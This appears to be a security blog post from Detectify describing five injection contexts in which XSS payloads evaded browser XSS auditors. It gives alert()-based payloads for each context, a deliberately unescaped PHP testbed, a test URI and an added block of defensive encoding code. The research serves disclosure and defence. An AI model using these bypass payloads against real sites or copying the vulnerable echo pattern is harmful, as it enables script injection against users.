While integrating a new JavaScript engine into Detectify, we discovered that the XSS auditors in modern browsers weren't as good at catching special cases as we thought. Considering that we had such a good response to our previous post on bypassing the Chrome XSS Auditor, we thought this would make a fitting post.
But never mind the details, let's get to it!
Context 1:
<script src="[Injection]"></script>
Injection: data:,alert(1)
<script src="data:,alert(1)"></script>
Works in: Chrome, Opera, Firefox, IE
Context 2:
<img src="notfound" onerror="[Injection]" />
Injection: alert(2)
<img src="notfound" onerror="alert(2)" />
Works in: Chrome, Opera, Firefox, IE
Context 3:
<script>var string = "[Injection]"</script>
Injection: "*alert(3)*"
<script>var string = ""*alert(3)*""</script>
Works in: Chrome, Opera, Firefox
Context 4:
<iframe src="[Injection]"></iframe>
Injection: javascript:alert(4)
<iframe src="javascript:alert(4)"></iframe>
Works in: Chrome, Opera, Firefox
Context 5:
Some [Injection] text on the same line [Injection]
Injection: %0aalert(5)</script><script>-->
Some alert(5)</script><script>--> text on the same line alert(5)</script><script>-->
Works in: Chrome, Opera, Firefox
Note that context 5 only works with the "-->" style comment, and won't work with "/*" or "//" style comments.
Testbed
<html>
<script src="<?=@$_GET[1]?>"></script>
<script>var string = "<?=@$_GET[2]?>"</script>
<iframe src="<?=@$_GET[3]?>"></iframe>
<img src="x" onerror=<?=@$_GET[4]?> />
Some <?=@$_GET[5]?>text on the same line<?=@$_GET[5]?>
</html>
Test URI: ?1=data:,alert(1)&2="*alert(2)*"&3=javascript:alert(3)&4=onerror=alert(4)&5=%0aalert(5)</script><script>-->
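As an added example (not code from the original post or from Detectify), here is a server-side, context-aware encoder in JavaScript for the contexts above: it shows that each context needs its own treatment, that the src contexts need URL allowlisting rather than encoding, and that the post's test payloads become inert once the testbed is rendered this way. The function names and the `safeUrl` base URL are my own assumptions.

```javascript
// Added example, not from the original post: context-aware output encoding for the
// injection contexts above. Each context needs its own encoder; one generic
// HTML-escape pass is not enough, which is why browser auditors are only a mitigation.

// Contexts 1 and 4: a URL in a src attribute. Encoding does not help here because
// "data:" and "javascript:" are perfectly valid URLs; allow only http(s) or relative URLs.
function safeUrl(input) {
  let parsed;
  try {
    parsed = new URL(String(input), "https://example.invalid/"); // base only resolves relative URLs
  } catch (e) {
    return "about:blank";
  }
  return parsed.protocol === "http:" || parsed.protocol === "https:" ? String(input) : "about:blank";
}

// Any quoted HTML attribute value: numeric entities for the five significant characters.
function encodeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, c => "&#" + c.charCodeAt(0) + ";");
}

// Context 3: inside a JavaScript string literal. Hex-escaping every non-alphanumeric
// character closes both the quote breakout and the "</script>" breakout.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Context 5: HTML text content. '<' and '&' are what matter; '>' is encoded for symmetry.
function encodeHtmlText(s) {
  return String(s).replace(/[&<>]/g, c => "&#" + c.charCodeAt(0) + ";");
}

// Safe rendering of the post's testbed. Context 2 (the onerror handler) has no encoder:
// whatever lands in an event-handler attribute is executed as JavaScript, so untrusted
// data must simply never be placed there; the handler below is a fixed string.
function renderTestbed(p) {
  return [
    '<script src="' + encodeHtmlAttr(safeUrl(p[1])) + '"></script>',
    '<script>var string = "' + encodeJsString(p[2]) + '"</script>',
    '<iframe src="' + encodeHtmlAttr(safeUrl(p[3])) + '"></iframe>',
    '<img src="x" onerror="this.remove()" />',
    'Some ' + encodeHtmlText(p[5]) + ' text on the same line ' + encodeHtmlText(p[5]),
  ].join("\n");
}
```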
In defense of the developers of the auditors/filters, these filters are only meant to be a mitigation, "as good as possible" rather than complete. While it's no secret that they don't catch everything, we still thought we would share the specific contexts we had discovered.
Author: Mathias Karlsson